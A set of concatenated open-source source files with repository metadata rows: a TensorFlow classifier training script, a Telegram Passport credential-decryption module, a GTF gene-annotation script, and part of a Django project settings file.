self.cross_validation.filenames = self.everything.filenames[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
self.cross_validation.length = int(self.everything.length * (1 - test_percent)) - int(self.everything.length * (1 - cv_percent - test_percent))
# Get our testing data.
self.testing.xs = self.everything.xs[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.ys = self.everything.ys[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.filenames = self.everything.filenames[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.length = self.everything.length - int(self.everything.length * (1 - test_percent))
elif split_type == "test":
# Get our training data.
self.training.xs = self.everything.xs[0:int(self.everything.length * (1 - test_percent))]
self.training.ys = self.everything.ys[0:int(self.everything.length * (1 - test_percent))]
self.training.filenames = self.everything.filenames[0:int(self.everything.length * (1 - test_percent))]
self.training.length = int(self.everything.length * (1 - test_percent))
# Get our testing data.
self.testing.xs = self.everything.xs[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.ys = self.everything.ys[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.filenames = self.everything.filenames[int(self.everything.length * (1 - test_percent)):self.everything.length]
self.testing.length = self.everything.length - int(self.everything.length * (1 - test_percent))
else:
# Get our training data.
self.training.xs = self.everything.xs[0:self.everything.length]
self.training.ys = self.everything.ys[0:self.everything.length]
self.training.filenames = self.everything.filenames[0:self.everything.length]
self.training.length = self.everything.length
# Setup our weights and biases and try to prevent them from
# ever getting to 0 (dying) as best we can.
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name="W" + name)
def bias_variable(shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name="b" + name)
# Setup our convolution (with strides of 1).
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
# Setup our pooling options (2x2 matrix for pooling)
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# Creates a convolutional pooling network.
def create_conv_pool(input, input_size, output_size, name="conv"):
with tf.name_scope(name):
weights = weight_variable([5, 5, input_size, output_size])
biases = bias_variable([output_size])
activation = tf.nn.relu(conv2d(input, weights) + biases)
tf.summary.histogram("weights", weights)
tf.summary.histogram("biases", biases)
tf.summary.histogram("activations", activation)
return max_pool_2x2(activation)
# Creates our fully connected layer.
def create_fc_layer(input, input_size, output_size, name="fc"):
with tf.name_scope(name):
weights = weight_variable([input_size, output_size])
biases = bias_variable([output_size])
flat_input = tf.reshape(input, [-1, input_size])
return tf.nn.relu(tf.matmul(flat_input, weights) + biases)
# Creates our dropout layer which is used for our prediction.
def create_dropout_connected_readout(input, input_size, output_size, name="readout"):
with tf.name_scope(name):
weights = weight_variable([input_size, output_size])
biases = bias_variable([output_size])
weight_dropout = tf.nn.dropout(weights, keep_prob) * keep_prob
return tf.matmul(input, weight_dropout) + biases
def create_layer(name, input, input_shape, output_shape, activation_function=None):
# Create our weights and calculate our prediction.
W = weight_variable([input_shape, output_shape], name)
b = bias_variable([output_shape], name)
y = tf.matmul(input, W) + b
if activation_function is "softmax":
y = tf.nn.softmax(y)
if activation_function is "relu":
y = tf.nn.relu(y)
# Give some summaries for the outputs.
tf.summary.histogram("weights_" + name, W)
tf.summary.histogram("biases_" + name, b)
tf.summary.histogram("y_" + name, y)
return W, y
with tf.name_scope("prediction"):
x = tf.placeholder(tf.float32, [None, FEATURES], name="inputs")
keep_prob = tf.placeholder(tf.float32, name="kP")
y_ = tf.placeholder(tf.float32, [None, OUTPUTS], name="actuals")
W_input, y_input = create_layer("input", x, FEATURES, 100, activation_function="softmax")
W_hidden, y_hidden = create_layer("hidden", y_input, 100, 100, activation_function=None)
W_activation, y_activation = create_layer("activation", y_hidden, 100, OUTPUTS, activation_function=None)
prediction = tf.nn.softmax(y_activation)
# Get our calculated input (1 if survived, 0 otherwise)
output = tf.argmax(prediction, 1)
# Now calculate the error and train it.
with tf.name_scope("cost"):
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_activation))
tf.summary.scalar("cost", cost)
with tf.name_scope("train"):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cost)
# Calculate the list of correct predictions.
correct_prediction = tf.cast(tf.equal(tf.argmax(prediction, 1), tf.argmax(y_, 1)), tf.float32)
# We want calculate the accuracy from an input, that way we can batch everything.
prediction_results = tf.placeholder_with_default(correct_prediction, [None], name="prediction_results")
accuracy = tf.reduce_mean(prediction_results)
tf.summary.scalar("accuracy", accuracy)
# Calculate our F1 score. Need to learn how to do with multiclass.
# tp = tf.count_nonzero(tf.argmax(prediction, 1) * tf.argmax(y_, 1))
# tn = tf.count_nonzero((tf.argmax(prediction, 1) - 1) * (tf.argmax(y_, 1) - 1))
# fp = tf.count_nonzero(tf.argmax(prediction, 1) * (tf.argmax(y_, 1) - 1))
# fn = tf.count_nonzero((tf.argmax(prediction, 1) - 1) * tf.argmax(y_, 1))
# precision = tp / (tp + fp)
# recall = tp / (tp + fn)
# f1 = 2 * precision * recall / (precision + recall)
# tf.summary.scalar("f1", f1)
saver = tf.train.Saver(tf.global_variables())
#############################################################
#############################################################
#############################################################
# Helper methods for utilizing the neural network. #########
#############################################################
#############################################################
#############################################################
def setup(log_dir):
# Setup our session.
sess = tf.InteractiveSession()
merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(log_dir)
writer.add_graph(sess.graph)
tf.global_variables_initializer().run()
return sess, merged_summary, writer
# Keep track of our training iterations.
training_iteration = 0
def train(sess, data, batch=1):
global training_iteration
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
sess.run(train_step, feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 0.5, y_: data.training.ys[data_start:data_end]})
training_iteration += 1
if batch > 1:
progress = int((i / (batch + 1)) * 10)
print('\rBatched Training: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
def train_summary(sess, data, merged_summary, writer, batch=1):
global training_iteration
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
s, t = sess.run([merged_summary, train_step], feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 0.5, y_: data.training.ys[data_start:data_end]})
writer.add_summary(s, training_iteration)
training_iteration += 1
if batch > 1:
progress = int((i / batch) * 10)
print('\rBatched Training: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
# Accuracy methods.
def get_train_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.training.length)
data_end = int((i / batch) * data.training.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.training.xs[data_start:data_end], keep_prob: 1.0, y_: data.training.ys[data_start:data_end]})
total_predictions = np.concatenate((total_predictions, predictions), axis=0)
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_cv_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.cross_validation.length)
data_end = int((i / batch) * data.cross_validation.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.cross_validation.xs[data_start:data_end], keep_prob: 1.0, y_: data.cross_validation.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_test_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.testing.length)
data_end = int((i / batch) * data.testing.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.testing.xs[data_start:data_end], keep_prob: 1.0, y_: data.testing.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
def get_total_accuracy(sess, data, batch=1):
total_predictions = []
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.everything.length)
data_end = int((i / batch) * data.everything.length)
predictions = sess.run(correct_prediction, feed_dict={x: data.everything.xs[data_start:data_end], keep_prob: 1.0, y_: data.everything.ys[data_start:data_end]})
total_predictions += predictions
return sess.run(accuracy, feed_dict={prediction_results: total_predictions}) * 100
# Cost methods.
def get_train_cost(sess, data):
return sess.run(cost, feed_dict={x: data.training.xs, keep_prob: 1.0, y_: data.training.ys})
def get_cv_cost(sess, data):
return sess.run(cost, feed_dict={x: data.cross_validation.xs, keep_prob: 1.0, y_: data.cross_validation.ys})
def get_test_cost(sess, data):
return sess.run(cost, feed_dict={x: data.testing.xs, keep_prob: 1.0, y_: data.testing.ys})
def get_total_cost(sess, data):
return sess.run(cost, feed_dict={x: data.everything.xs, keep_prob: 1.0, y_: data.everything.ys})
# F1 Score methods.
# def get_train_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.training.xs, keep_prob: 1.0, y_: data.training.ys})
# def get_cv_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.cross_validation.xs, keep_prob: 1.0, y_: data.cross_validation.ys})
# def get_test_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.testing.xs, keep_prob: 1.0, y_: data.testing.ys})
# def get_total_f1_score(sess, data):
# return sess.run(f1, feed_dict={x: data.everything.xs, keep_prob: 1.0, y_: data.everything.ys})
def reset():
tf.global_variables_initializer().run()
def load_model(sess, model_name, directory="model"):
if os.path.exists(directory):
saver.restore(sess, directory + "/" + model_name);
else:
print("Error loading model!")
exit(-1)
def save_model(sess, model_name, directory="model"):
if not os.path.exists(directory):
os.makedirs(directory)
saver.save(sess, directory + "/" + model_name);
def save_outputs(sess, data, output_file_name, include_actual=True, batch=1):
# And finally write the results to an output file.
with open(output_file_name, "w") as out_file:
out_file.write("fname,label{0}\n".format(",actual" if include_actual else ""))
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.everything.length)
data_end = int((i / batch) * data.everything.length)
results = sess.run(output, feed_dict={x: data.everything.xs[data_start:data_end], keep_prob: 1.0, y_: data.everything.ys[data_start:data_end]})
for filename, prediction, actual in zip(data.everything.filenames[data_start:data_end], results, data.everything.ys[data_start:data_end]):
out_file.write("{0},{1}{2}\n".format(filename, RESULT_MAP[prediction], ("," + RESULT_MAP[actual.index(1)]) if include_actual else ""))
if batch > 1:
progress = int((i / batch) * 10)
print('\rSaving results: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
| mit | 5,033,618,991,164,514,000 | 50.929766 | 183 | 0.638243 | false |
noam09/deluge-telegramer | telegramer/include/telegram/passport/credentials.py | 1 | 17262 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2018
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
try:
import ujson as json
except ImportError:
import json
from base64 import b64decode
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import OAEP, MGF1
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA512, SHA256, Hash, SHA1
from future.utils import bord
from telegram import TelegramObject, TelegramError
class TelegramDecryptionError(TelegramError):
"""
Something went wrong with decryption.
"""
def __init__(self, message):
super(TelegramDecryptionError, self).__init__("TelegramDecryptionError: "
"{}".format(message))
def decrypt(secret, hash, data):
"""
Decrypt per telegram docs at https://core.telegram.org/passport.
Args:
secret (:obj:`str` or :obj:`bytes`): The encryption secret, either as bytes or as a
base64 encoded string.
hash (:obj:`str` or :obj:`bytes`): The hash, either as bytes or as a
base64 encoded string.
data (:obj:`str` or :obj:`bytes`): The data to decrypt, either as bytes or as a
base64 encoded string.
file (:obj:`bool`): Force data to be treated as raw data, instead of trying to
b64decode it.
Raises:
:class:`TelegramDecryptionError`: Given hash does not match hash of decrypted data.
Returns:
:obj:`bytes`: The decrypted data as bytes.
"""
# Make a SHA512 hash of secret + update
digest = Hash(SHA512(), backend=default_backend())
digest.update(secret + hash)
secret_hash_hash = digest.finalize()
# First 32 chars is our key, next 16 is the initialisation vector
key, iv = secret_hash_hash[:32], secret_hash_hash[32:32 + 16]
# Init a AES-CBC cipher and decrypt the data
cipher = Cipher(AES(key), CBC(iv), backend=default_backend())
decryptor = cipher.decryptor()
data = decryptor.update(data) + decryptor.finalize()
# Calculate SHA256 hash of the decrypted data
digest = Hash(SHA256(), backend=default_backend())
digest.update(data)
data_hash = digest.finalize()
# If the newly calculated hash did not match the one telegram gave us
if data_hash != hash:
# Raise a error that is caught inside telegram.PassportData and transformed into a warning
raise TelegramDecryptionError("Hashes are not equal! {} != {}".format(data_hash, hash))
# Return data without padding
return data[bord(data[0]):]
def decrypt_json(secret, hash, data):
"""Decrypts data using secret and hash and then decodes utf-8 string and loads json"""
return json.loads(decrypt(secret, hash, data).decode('utf-8'))
class EncryptedCredentials(TelegramObject):
"""Contains data required for decrypting and authenticating EncryptedPassportElement. See the
Telegram Passport Documentation for a complete description of the data decryption and
authentication processes.
Attributes:
data (:class:`telegram.Credentials` or :obj:`str`): Decrypted data with unique user's
nonce, data hashes and secrets used for EncryptedPassportElement decryption and
authentication or base64 encrypted data.
hash (:obj:`str`): Base64-encoded data hash for data authentication.
secret (:obj:`str`): Decrypted or encrypted secret used for decryption.
Args:
data (:class:`telegram.Credentials` or :obj:`str`): Decrypted data with unique user's
nonce, data hashes and secrets used for EncryptedPassportElement decryption and
authentication or base64 encrypted data.
hash (:obj:`str`): Base64-encoded data hash for data authentication.
secret (:obj:`str`): Decrypted or encrypted secret used for decryption.
**kwargs (:obj:`dict`): Arbitrary keyword arguments.
Note:
This object is decrypted only when originating from
:obj:`telegram.PassportData.decrypted_credentials`.
"""
def __init__(self, data, hash, secret, bot=None, **kwargs):
# Required
self.data = data
self.hash = hash
self.secret = secret
self._id_attrs = (self.data, self.hash, self.secret)
self.bot = bot
self._decrypted_secret = None
self._decrypted_data = None
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data = super(EncryptedCredentials, cls).de_json(data, bot)
return cls(bot=bot, **data)
@property
def decrypted_secret(self):
"""
:obj:`str`: Lazily decrypt and return secret.
Raises:
telegram.TelegramDecryptionError: Decryption failed. Usually due to bad
private/public key but can also suggest malformed/tampered data.
"""
if self._decrypted_secret is None:
# Try decrypting according to step 1 at
# https://core.telegram.org/passport#decrypting-data
# We make sure to base64 decode the secret first.
# Telegram says to use OAEP padding so we do that. The Mask Generation Function
# is the default for OAEP, the algorithm is the default for PHP which is what
# Telegram's backend servers run.
try:
self._decrypted_secret = self.bot.private_key.decrypt(b64decode(self.secret), OAEP(
mgf=MGF1(algorithm=SHA1()),
algorithm=SHA1(),
label=None
))
except ValueError as e:
# If decryption fails raise exception
raise TelegramDecryptionError(e)
return self._decrypted_secret
@property
def decrypted_data(self):
"""
:class:`telegram.Credentials`: Lazily decrypt and return credentials data. This object
also contains the user specified nonce as
`decrypted_data.nonce`.
Raises:
telegram.TelegramDecryptionError: Decryption failed. Usually due to bad
private/public key but can also suggest malformed/tampered data.
"""
if self._decrypted_data is None:
self._decrypted_data = Credentials.de_json(decrypt_json(self.decrypted_secret,
b64decode(self.hash),
b64decode(self.data)),
self.bot)
return self._decrypted_data
class Credentials(TelegramObject):
"""
Attributes:
secure_data (:class:`telegram.SecureData`): Credentials for encrypted data
nonce (:obj:`str`): Bot-specified nonce
"""
def __init__(self, secure_data, nonce, bot=None, **kwargs):
# Required
self.secure_data = secure_data
self.nonce = nonce
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['secure_data'] = SecureData.de_json(data.get('secure_data'), bot=bot)
return cls(bot=bot, **data)
class SecureData(TelegramObject):
"""
This object represents the credentials that were used to decrypt the encrypted data.
All fields are optional and depend on fields that were requested.
Attributes:
personal_details (:class:`telegram.SecureValue`, optional): Credentials for encrypted
personal details.
passport (:class:`telegram.SecureValue`, optional): Credentials for encrypted passport.
internal_passport (:class:`telegram.SecureValue`, optional): Credentials for encrypted
internal passport.
driver_license (:class:`telegram.SecureValue`, optional): Credentials for encrypted
driver license.
identity_card (:class:`telegram.SecureValue`, optional): Credentials for encrypted ID card
address (:class:`telegram.SecureValue`, optional): Credentials for encrypted
residential address.
utility_bill (:class:`telegram.SecureValue`, optional): Credentials for encrypted
utility bill.
bank_statement (:class:`telegram.SecureValue`, optional): Credentials for encrypted
bank statement.
rental_agreement (:class:`telegram.SecureValue`, optional): Credentials for encrypted
rental agreement.
passport_registration (:class:`telegram.SecureValue`, optional): Credentials for encrypted
registration from internal passport.
temporary_registration (:class:`telegram.SecureValue`, optional): Credentials for encrypted
temporary registration.
"""
def __init__(self,
personal_details=None,
passport=None,
internal_passport=None,
driver_license=None,
identity_card=None,
address=None,
utility_bill=None,
bank_statement=None,
rental_agreement=None,
passport_registration=None,
temporary_registration=None,
bot=None,
**kwargs):
# Optionals
self.temporary_registration = temporary_registration
self.passport_registration = passport_registration
self.rental_agreement = rental_agreement
self.bank_statement = bank_statement
self.utility_bill = utility_bill
self.address = address
self.identity_card = identity_card
self.driver_license = driver_license
self.internal_passport = internal_passport
self.passport = passport
self.personal_details = personal_details
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['temporary_registration'] = SecureValue.de_json(data.get('temporary_registration'),
bot=bot)
data['passport_registration'] = SecureValue.de_json(data.get('passport_registration'),
bot=bot)
data['rental_agreement'] = SecureValue.de_json(data.get('rental_agreement'), bot=bot)
data['bank_statement'] = SecureValue.de_json(data.get('bank_statement'), bot=bot)
data['utility_bill'] = SecureValue.de_json(data.get('utility_bill'), bot=bot)
data['address'] = SecureValue.de_json(data.get('address'), bot=bot)
data['identity_card'] = SecureValue.de_json(data.get('identity_card'), bot=bot)
data['driver_license'] = SecureValue.de_json(data.get('driver_license'), bot=bot)
data['internal_passport'] = SecureValue.de_json(data.get('internal_passport'), bot=bot)
data['passport'] = SecureValue.de_json(data.get('passport'), bot=bot)
data['personal_details'] = SecureValue.de_json(data.get('personal_details'), bot=bot)
return cls(bot=bot, **data)
class SecureValue(TelegramObject):
"""
This object represents the credentials that were used to decrypt the encrypted value.
All fields are optional and depend on the type of field.
Attributes:
data (:class:`telegram.DataCredentials`, optional): Credentials for encrypted Telegram
Passport data. Available for "personal_details", "passport", "driver_license",
"identity_card", "identity_passport" and "address" types.
front_side (:class:`telegram.FileCredentials`, optional): Credentials for encrypted
document's front side. Available for "passport", "driver_license", "identity_card"
and "internal_passport".
reverse_side (:class:`telegram.FileCredentials`, optional): Credentials for encrypted
document's reverse side. Available for "driver_license" and "identity_card".
selfie (:class:`telegram.FileCredentials`, optional): Credentials for encrypted selfie
of the user with a document. Can be available for "passport", "driver_license",
"identity_card" and "internal_passport".
translation (List[:class:`telegram.FileCredentials`], optional): Credentials for an
encrypted translation of the document. Available for "passport", "driver_license",
"identity_card", "internal_passport", "utility_bill", "bank_statement",
"rental_agreement", "passport_registration" and "temporary_registration".
files (List[:class:`telegram.FileCredentials`], optional): Credentials for encrypted
files. Available for "utility_bill", "bank_statement", "rental_agreement",
"passport_registration" and "temporary_registration" types.
"""
def __init__(self,
data=None,
front_side=None,
reverse_side=None,
selfie=None,
files=None,
translation=None,
bot=None,
**kwargs):
self.data = data
self.front_side = front_side
self.reverse_side = reverse_side
self.selfie = selfie
self.files = files
self.translation = translation
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['data'] = DataCredentials.de_json(data.get('data'), bot=bot)
data['front_side'] = FileCredentials.de_json(data.get('front_side'), bot=bot)
data['reverse_side'] = FileCredentials.de_json(data.get('reverse_side'), bot=bot)
data['selfie'] = FileCredentials.de_json(data.get('selfie'), bot=bot)
data['files'] = FileCredentials.de_list(data.get('files'), bot=bot)
data['translation'] = FileCredentials.de_list(data.get('translation'), bot=bot)
return cls(bot=bot, **data)
def to_dict(self):
data = super(SecureValue, self).to_dict()
data['files'] = [p.to_dict() for p in self.files]
data['translation'] = [p.to_dict() for p in self.translation]
return data
class _CredentialsBase(TelegramObject):
"""Base class for DataCredentials and FileCredentials."""
def __init__(self, hash, secret, bot=None, **kwargs):
self.hash = hash
self.secret = secret
# Aliases just be be sure
self.file_hash = self.hash
self.data_hash = self.hash
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
return cls(bot=bot, **data)
@classmethod
def de_list(cls, data, bot):
if not data:
return []
credentials = list()
for c in data:
credentials.append(cls.de_json(c, bot=bot))
return credentials
class DataCredentials(_CredentialsBase):
"""
These credentials can be used to decrypt encrypted data from the data field in
EncryptedPassportData.
Args:
data_hash (:obj:`str`): Checksum of encrypted data
secret (:obj:`str`): Secret of encrypted data
Attributes:
hash (:obj:`str`): Checksum of encrypted data
secret (:obj:`str`): Secret of encrypted data
"""
def __init__(self, data_hash, secret, **kwargs):
super(DataCredentials, self).__init__(data_hash, secret, **kwargs)
def to_dict(self):
data = super(DataCredentials, self).to_dict()
del data['file_hash']
del data['hash']
return data
class FileCredentials(_CredentialsBase):
"""
These credentials can be used to decrypt encrypted files from the front_side,
reverse_side, selfie and files fields in EncryptedPassportData.
Args:
file_hash (:obj:`str`): Checksum of encrypted file
secret (:obj:`str`): Secret of encrypted file
Attributes:
hash (:obj:`str`): Checksum of encrypted file
secret (:obj:`str`): Secret of encrypted file
"""
def __init__(self, file_hash, secret, **kwargs):
super(FileCredentials, self).__init__(file_hash, secret, **kwargs)
def to_dict(self):
data = super(FileCredentials, self).to_dict()
del data['data_hash']
del data['hash']
return data
| gpl-3.0 | -7,892,456,958,463,140,000 | 38.321185 | 99 | 0.630344 | false |
ngsutils/ngsutils | ngsutils/gtf/add_xref.py | 1 | 3246 | #!/usr/bin/env python
## category General
## desc Appends name annotation from UCSC Xref file
'''Adds gene name annotations to a GTF file (xref)
This adds gene name annotations based upon the KnownGene annotations from the
UCSC Genome Browser. Gene names will be taken from the kgXref table. This
table must be downloaded separately from the UCSC Genome Browser.
This assumes that the file will be in tab-delimited format and that there is
one line for each transcript. You may specify which column represents the gene
name. In the standard "kgXref.txt" file, this is column #5.
This will add the following attributes:
gene_name
'''
import sys
import os
from ngsutils.support import gzip_reader
def gtf_add_xref(gtf, xref, column=4, out=sys.stdout, quiet=False):
gene_names = {}
if not quiet:
sys.stderr.write('Reading xref...\n')
for line in gzip_reader(xref):
if line[0] == '#':
continue
cols = line.rstrip().split('\t')
gene_names[cols[0]] = cols[column]
if not quiet:
sys.stderr.write('Reading/writing GTF...\n')
for line in gzip_reader(gtf):
try:
comment = None
idx = line.find('#')
if idx > -1:
if idx == 0:
sys.stdout.write(line)
continue
comment = line[idx:]
line = line[:-idx]
chrom, source, feature, start, end, score, strand, frame, attrs = line.rstrip().split('\t')
transcript_id = None
for key, val in [x.split(' ') for x in [x.strip() for x in attrs.split(';')] if x]:
if val[0] == '"' and val[-1] == '"':
val = val[1:-1]
if key == 'transcript_id':
transcript_id = val
if attrs[-1] != ';':
attrs = '%s;' % attrs
if transcript_id in gene_names:
attrs = '%s gene_name "%s";' % (attrs, gene_names[transcript_id])
out.write('\t'.join([chrom, source, feature, start, end, score, strand, frame, attrs]))
if comment:
out.write('\t%s' % comment)
out.write('\n')
except:
import traceback
sys.stderr.write('Error parsing line:\n%s\n' % line)
traceback.print_exc()
sys.exit(1)
def usage(msg=None):
if msg:
print msg
print __doc__
print '''\
Usage: gtfutils add_xref {-col num} filename.gtf kgXref.txt
Options:
-col num The gene name is stored in column {num} (1-based)
(default:5)
'''
sys.exit(1)
if __name__ == '__main__':
gtf = None
xref = None
column = 4
last = None
for arg in sys.argv[1:]:
if last == '-col':
column = int(arg) - 1
last = None
elif not gtf and (os.path.exists(arg) or arg == '-'):
gtf = arg
elif not xref and (os.path.exists(arg) or arg == '-'):
xref = arg
elif arg in ['-col']:
last = arg
if not gtf or not xref:
usage()
if gtf == '-' and xref == '-':
usage('Both GTF and Xref files can not be from stdin')
gtf_add_xref(gtf, xref, column)
| bsd-3-clause | -469,859,513,389,635,600 | 29.336449 | 103 | 0.541282 | false |
parksandwildlife/ibms | ibms_project/settings.py | 1 | 5554 | from dbca_utils.utils import env
import dj_database_url
import os
from pathlib import Path
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = str(Path(__file__).resolve().parents[1])
PROJECT_DIR = str(Path(__file__).resolve().parents[0])
# Add PROJECT_DIR to the system path.
sys.path.insert(0, PROJECT_DIR)
# Settings defined in environment variables.
DEBUG = env('DEBUG', False)
SECRET_KEY = env('SECRET_KEY', 'PlaceholderSecretKey')
CSRF_COOKIE_SECURE = env('CSRF_COOKIE_SECURE', False)
SESSION_COOKIE_SECURE = env('SESSION_COOKIE_SECURE', False)
if not DEBUG:
ALLOWED_HOSTS = env('ALLOWED_DOMAINS', '').split(',')
else:
ALLOWED_HOSTS = ['*']
INTERNAL_IPS = ['127.0.0.1', '::1']
ROOT_URLCONF = 'ibms_project.urls'
WSGI_APPLICATION = 'ibms_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django_extensions',
'raven.contrib.django.raven_compat',
'crispy_forms',
'webtemplate_dbca',
'ibms',
'sfm',
)
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'dbca_utils.middleware.SSOLoginMiddleware',
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (os.path.join(BASE_DIR, 'ibms_project', 'templates'),),
'APP_DIRS': True,
'OPTIONS': {
'debug': DEBUG,
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.request',
'django.template.context_processors.csrf',
'django.contrib.messages.context_processors.messages',
'ibms_project.context_processors.standard'
],
},
}
]
SITE_TITLE = 'Integrated Business Management System'
SITE_ACRONYM = 'IBMS'
APPLICATION_VERSION_NO = '2.4.5'
ADMINS = ('[email protected]',)
MANAGERS = (
('Graham Holmes', '[email protected]', '9881 9212'),
('Neil Clancy', '[email protected]', '9219 9926'),
)
SITE_ID = 1
ANONYMOUS_USER_ID = 1
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
CONFLUENCE_URL = env('CONFLUENCE_URL', '')
# URLs to the IBM Code Updater spreadsheets on Confluence, so that the Custodian
# can update them without a code change.
IBM_CODE_UPDATER_URI = env('IBM_CODE_UPDATER_URI', '')
IBM_SERVICE_PRIORITY_URI = env('IBM_SERVICE_PRIORITY_URI', '')
IBM_RELOAD_URI = env('IBM_RELOAD_URI', '')
IBM_DATA_AMEND_URI = env('IBM_DATA_AMEND_URI', '')
HELP_URL = CONFLUENCE_URL
CRISPY_TEMPLATE_PACK = 'bootstrap3'
DATA_UPLOAD_MAX_NUMBER_FIELDS = None # Required to allow end-of-month GLPivot bulk deletes.
# Database configuration
DATABASES = {
# Defined in DATABASE_URL env variable.
'default': dj_database_url.config(),
}
# Static files (CSS, JavaScript, Images)
# Ensure that the media directory exists:
if not os.path.exists(os.path.join(BASE_DIR, 'media')):
os.mkdir(os.path.join(BASE_DIR, 'media'))
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(PROJECT_DIR, 'static'), )
# Internationalisation.
USE_I18N = False
USE_TZ = True
TIME_ZONE = 'Australia/Perth'
LANGUAGE_CODE = 'en-us'
DATE_INPUT_FORMATS = (
'%d/%m/%y',
'%d/%m/%Y',
'%d-%m-%y',
'%d-%m-%Y',
'%d %b %Y',
'%d %b, %Y',
'%d %B %Y',
'%d %B, %Y')
DATETIME_INPUT_FORMATS = (
'%d/%m/%y %H:%M',
'%d/%m/%Y %H:%M',
'%d-%m-%y %H:%M',
'%d-%m-%Y %H:%M',)
# Email settings.
EMAIL_HOST = env('EMAIL_HOST', 'email.host')
EMAIL_PORT = env('EMAIL_PORT', 25)
# Logging settings - log to stdout/stderr
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {'format': '%(asctime)s %(name)-12s %(message)s'},
'verbose': {'format': '%(asctime)s %(levelname)-8s %(message)s'},
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'sentry': {
'level': 'WARNING',
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'propagate': True,
},
'django.request': {
'handlers': ['console', 'sentry'],
'level': 'WARNING',
'propagate': False,
},
